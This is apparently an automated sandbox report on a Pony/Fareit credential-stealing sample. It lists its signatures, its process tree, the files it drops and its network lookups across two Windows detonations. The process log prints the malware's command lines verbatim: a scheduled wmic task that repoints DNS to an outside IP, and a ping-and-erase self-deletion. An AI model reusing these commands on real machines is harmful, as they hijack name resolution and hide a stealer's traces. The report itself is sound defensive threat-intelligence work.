Analysis Overview
SHA256
63c7adeeaeee43416ae5543990b7c1eaa4582a24579ceccba85d2011c3ed726a
Threat Level: Known bad
The file 63c7adeeaeee43416ae5543990b7c1eaa4582a24579ceccba85d2011c3ed726a was found to be: Known bad.
Malicious Activity Summary
Pony,Fareit
UPX packed file
Reads data files stored by FTP clients
Checks computer location settings
Reads user/profile data of web browsers
Deletes itself
Checks installed software on the system
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of SetThreadContext
Drops file in Windows directory
Program crash
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Runs ping.exe
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-11-19 03:28
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-11-19 03:28
Reported
2022-11-19 03:30
Platform
win7-20220901-en
Max time kernel
71s
Max time network
59s
Command Line
Signatures
Pony,Fareit
UPX packed file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\63c7adeeaeee43416ae5543990b7c1eaa4582a24579ceccba85d2011c3ed726a.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1768 set thread context of 1284 | N/A | C:\Users\Admin\AppData\Local\Temp\63c7adeeaeee43416ae5543990b7c1eaa4582a24579ceccba85d2011c3ed726a.exe | C:\Users\Admin\AppData\Local\Temp\63c7adeeaeee43416ae5543990b7c1eaa4582a24579ceccba85d2011c3ed726a.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\calc2.exe | C:\Users\Admin\AppData\Local\Temp\63c7adeeaeee43416ae5543990b7c1eaa4582a24579ceccba85d2011c3ed726a.exe | N/A |
Enumerates physical storage devices
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\63c7adeeaeee43416ae5543990b7c1eaa4582a24579ceccba85d2011c3ed726a.exe
"C:\Users\Admin\AppData\Local\Temp\63c7adeeaeee43416ae5543990b7c1eaa4582a24579ceccba85d2011c3ed726a.exe"
C:\Users\Admin\AppData\Local\Temp\63c7adeeaeee43416ae5543990b7c1eaa4582a24579ceccba85d2011c3ed726a.exe
"C:\Users\Admin\AppData\Local\Temp\63c7adeeaeee43416ae5543990b7c1eaa4582a24579ceccba85d2011c3ed726a.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c at 03:32:00 /every:T,M,Th,F,W,S,Su wmic.exe nicconfig where "IPEnabled=true" call SetDNSServerSearchOrder ("37.10.116.201", "8.8.8.8")
C:\Windows\SysWOW64\at.exe
at 03:32:00 /every:T,M,Th,F,W,S,Su wmic.exe nicconfig where "IPEnabled=true" call SetDNSServerSearchOrder ("37.10.116.201", "8.8.8.8")
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping -n 10 localhost && erase "C:\Users\Admin\AppData\Local\Temp\63c7adeeaeee43416ae5543990b7c1eaa4582a24579ceccba85d2011c3ed726a.exe"
C:\Windows\SysWOW64\PING.EXE
ping -n 10 localhost
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | selaqty.pw | udp |
| N/A | 8.8.8.8:53 | kdotojk.pw | udp |
| N/A | 8.8.8.8:53 | vodiklas.pw | udp |
Files
memory/1284-54-0x0000000000400000-0x000000000041C000-memory.dmp
memory/1284-55-0x0000000000400000-0x000000000041C000-memory.dmp
memory/1284-56-0x0000000000400000-0x000000000041C000-memory.dmp
memory/1768-58-0x00000000000E0000-0x00000000000EC000-memory.dmp
memory/1284-60-0x0000000075931000-0x0000000075933000-memory.dmp
memory/1284-61-0x0000000000400000-0x000000000041C000-memory.dmp
memory/1284-62-0x0000000000400000-0x000000000041C000-memory.dmp
memory/1284-63-0x0000000000400000-0x000000000041C000-memory.dmp
memory/584-64-0x0000000000000000-mapping.dmp
memory/1428-65-0x0000000000000000-mapping.dmp
memory/520-67-0x0000000000000000-mapping.dmp
memory/1284-68-0x0000000000400000-0x000000000041C000-memory.dmp
memory/1512-69-0x0000000000000000-mapping.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-11-19 03:28
Reported
2022-11-19 03:32
Platform
win10v2004-20221111-en
Max time kernel
226s
Max time network
240s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\63c7adeeaeee43416ae5543990b7c1eaa4582a24579ceccba85d2011c3ed726a.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2672 set thread context of 4568 | N/A | C:\Users\Admin\AppData\Local\Temp\63c7adeeaeee43416ae5543990b7c1eaa4582a24579ceccba85d2011c3ed726a.exe | C:\Users\Admin\AppData\Local\Temp\63c7adeeaeee43416ae5543990b7c1eaa4582a24579ceccba85d2011c3ed726a.exe |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\63c7adeeaeee43416ae5543990b7c1eaa4582a24579ceccba85d2011c3ed726a.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\63c7adeeaeee43416ae5543990b7c1eaa4582a24579ceccba85d2011c3ed726a.exe
"C:\Users\Admin\AppData\Local\Temp\63c7adeeaeee43416ae5543990b7c1eaa4582a24579ceccba85d2011c3ed726a.exe"
C:\Users\Admin\AppData\Local\Temp\63c7adeeaeee43416ae5543990b7c1eaa4582a24579ceccba85d2011c3ed726a.exe
"C:\Users\Admin\AppData\Local\Temp\63c7adeeaeee43416ae5543990b7c1eaa4582a24579ceccba85d2011c3ed726a.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4568 -ip 4568
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 80
Network
| Country | Destination | Domain | Proto |
| N/A | 72.21.81.240:80 | N/A | tcp |
| N/A | 72.21.81.240:80 | N/A | tcp |
| N/A | 13.89.178.26:443 | N/A | tcp |
| N/A | 104.80.225.205:443 | N/A | tcp |
| N/A | 209.197.3.8:80 | N/A | tcp |
| N/A | 20.190.159.4:443 | N/A | tcp |
| N/A | 20.190.159.71:443 | N/A | tcp |
| N/A | 8.8.8.8:53 | 226.101.242.52.in-addr.arpa | udp |
Files
memory/4568-132-0x0000000000000000-mapping.dmp
memory/2672-134-0x00000000029A0000-0x00000000029AC000-memory.dmp